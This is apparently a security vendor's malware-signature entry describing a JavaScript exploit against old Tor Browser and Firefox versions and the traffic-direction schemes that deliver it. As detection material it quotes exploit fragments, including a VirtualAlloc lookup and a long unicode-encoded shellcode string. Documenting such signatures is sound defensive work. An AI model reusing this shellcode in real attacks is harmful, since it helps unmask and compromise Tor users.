Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: malware.tor_ff_exploit

Description: Detected a malicious JavaScript code that targets TOR users with old versions (before November of 2016) of Tor Browser and Firefox.

Hackers usually point injected scripts and iframes to intermediarry Traffic Direction Services (Servers) instead of the real sites that serve the malicious payload. This scheme adds flexibility to the attack. This additional layer may detect OS, browser, referer, country, IP and other features of visitors and redirect each category to the corresponding landing pages that would target the exact type of visitors. TDS' usually work as aggregators, buying traffic from hackers who compromise websites and selling it to various criminal groups who are interested in particular type of traffic.

The exploit code usually contains lines like these:

... f=this.​findPopRet("EAX"),g=this.pe.​resolve_imported_function("kernel32​.dll","VirtualAlloc"); ...
or
... 
var thecode
='\​ue8fc\u0089\u0000​\u8960\u31e5\u64d2\u528b\u8b30\u0c52\u528b​\u8b14\u2872\ub70f\u264a\uff31\uc031\u3cac\u7c61\u2c02\uc120\u0dcf​\uc701\uf0e2\u5752\u528b\u8b10\u3c42\ud001\u408b\u8578\u74c0\u014a\u50d0​\u488b\u8b18\u2058\ud301\u3ce3\u8b49\u8b34\ud601\​uff31\uc031\uc1ac​\u0dcf\uc701\ue038\uf475\u7d03\u3bf8\u247d\ue275\u8b58\u2458\ud301​\u8b66\u4b0c\u588b\u011c\u8bd3\u8b04\ud001\u4489\u2424\u5b5b\u5961\u515a​\ue0ff\u5f58\u8b5a\ueb12\u5d86\u858d\u0297\u0000\u6850\u774c\u0726\ud5ff\​uc085\u840f\u0185\u0000\u858d\u029e\u0000\u6850\u774c\u0726\​ud5ff\uc085\u840f\u016f\u0000\u90bb\u0001\u2900\u54dc\u6853\u8029\u006b​\ud5ff\udc01\uc085\u850f\u0155\u0000\u5050\u5050\u5040\u5040\​uea68\udf0f\uffe0\u31d5\uf7db\u39d3\u0fc3\u3a84\u0001\u8900\u68c3\u2705\​ue21b\u6866\u5000\uc931\uc180\u6602\u8951\u6ae2\u5210\u6853\ua599\u6174\ud5ff\uc085\u0874\u8dfe\u0248\u0000\ud775\u00b8\u0001\u2900\u89c4\u52e2\u5250\ub668\​ude49\uff01\u5fd5\uc481\u0100\u0000\uc085\u850f\u00f6\​u0000\ue857\u00fa\u0000\u895e\u8dca\ua7bd\​u0002
 \ue800\u00ec\u0000\u834f\u20fa\u057c\u20ba​\u0000\u8900\u56d1\ua4f3\u0db9\u0000​\u8d00\u8ab5\u0002\uf300\u89a4\u44bd\u0002\u5e00​\u6856\u28a9\u8034\ud5ff\uc085\u840f'
 ...



Affecting: Any web site (with more chances to find it on .onion websites).

Fore more information check:
Firefox Zero-Day Exploit to Unmask Tor Users Released Online
[tor-talk] Javascript exploit


For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb